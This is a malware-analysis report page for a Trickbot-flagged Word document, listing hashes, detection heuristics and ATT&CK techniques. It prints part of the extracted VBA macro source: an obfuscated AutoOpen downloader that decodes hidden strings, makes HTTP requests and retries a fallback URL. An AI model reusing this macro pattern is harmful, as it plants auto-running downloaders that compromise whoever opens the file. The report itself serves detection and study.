Trickbot — Office (OLE) malware analysis

Static analysis result for SHA-256 60a202fcc402e1d1…

MALICIOUS

Office (OLE)

132.5 KB Created: 2018-04-20 07:33:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 2b6b2a2d992a82fb9b6d5d9e0e5295f7 SHA-1: b39812c867a3ee9997734371fee4dc39d120be83 SHA-256: 60a202fcc402e1d1ba786b8810d631a18af0207b96fa5ad46f021601a221f845
262 Risk Score

Malware Insights

Trickbot · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with a signature indicating Trickbot. The presence of VBA macros, specifically an AutoOpen macro and CreateObject calls, strongly suggests malicious intent. The script attempts to download a second-stage payload by making HTTP requests to URLs constructed from obfuscated strings, which is a common Trickbot behavior.

Heuristics 8

  • ClamAV: Doc.Downloader.Trickbot-6444938-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Trickbot-6444938-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10920 bytes
SHA-256: 0f12976257708a2ed19d0fa6ad0bfd3076c48bcfa1302b20faa5a975ec0022f0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
t2201953
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
End Sub

Attribute VB_Name = "aliciamp3"
Function polojester()
polojester = "9E58|E697E5''Rhl5|Eunu"
End Function
    
Function llehangn()
llehangn = veotsirH.nekukufu
End Function

Function racing1965()
Set naryejec = CreateObject(UserForm1.TextBox3)
naryejec.Open UserForm1.TextBox2, abctrident(dylan2001), False
naryejec.send
If naryejec.Status <> 200 Then
naryejec.Open UserForm1.TextBox2, abctrident(goblue01), False
naryejec.send
Else
End If
daxdizpa naryejec
September1667
End Function


Attribute VB_Name = "AVODOROBELH"
Attribute VB_Base = "0{0A3FCBC7-A2A5-474F-A060-56F30A6DA1D4}{0111BA67-243D-4682-85BE-FF9E394FEFD3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub

Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub

Private Sub jupiter500_Change()
Set torontolee = CreateObject(deedflut)
esreeves = 97 * 10
esreeves = 74 * 9
esreeves = 81 + 10
esreeves = 67 + 13
esreeves = 40 + 18 + 7
esreeves = 59 - 100 - 8
wade1673 torontolee
End Sub

Private Sub Label1_Click()
MsgBox "Ok"
End Sub

Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub

Attribute VB_Name = "AVOHITLOB"
Attribute VB_Base = "0{6A9586A8-94BA-4473-ADB7-5E30387A65BA}{2557F000-7316-4D63-A3AA-25A41BB94DB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "broiddor"
Function heagrace()
heagrace = AVODOROBELH.Search11
End Function

Sub t2201953()
Randomize
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
veotsirH.zebrastart = "tetteris"
End Sub

Attribute VB_Name = "elsieroger"
Function abctrident(vokrabuhC)
wreckkha = ""
jokerhack = Len(vokrabuhC)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
For billfool = 1 To jokerhack
wreckkha = wreckkha + punkin198(sleekrel(vokrabuhC, billfool), 4)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
Next billfool
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
abctrident = wreckkha
End Function

Function deedflut()
deedflut = sunlibrary
End Function

Function sunlibrary()
sunlibrary = abctrident(ukayobkas.shoorbaa)
End Function


Attribute VB_Name = "evathrac"
Function open0318(ncccrapp, hootiebasf)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
open0318 = abctrident(AVODOROBELH.stalshaf) + ncccrapp + abctrident(AVOHITLOB.abcd2345) + _
 hootiebasf + abctrident(AVODOROBELH.musicjoe + AVODOROBELH.blackberry) + hootiebasf
End Function

Attribute VB_Name = "fionachip"
Function christyaaa(pantyman)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
ch
... (truncated)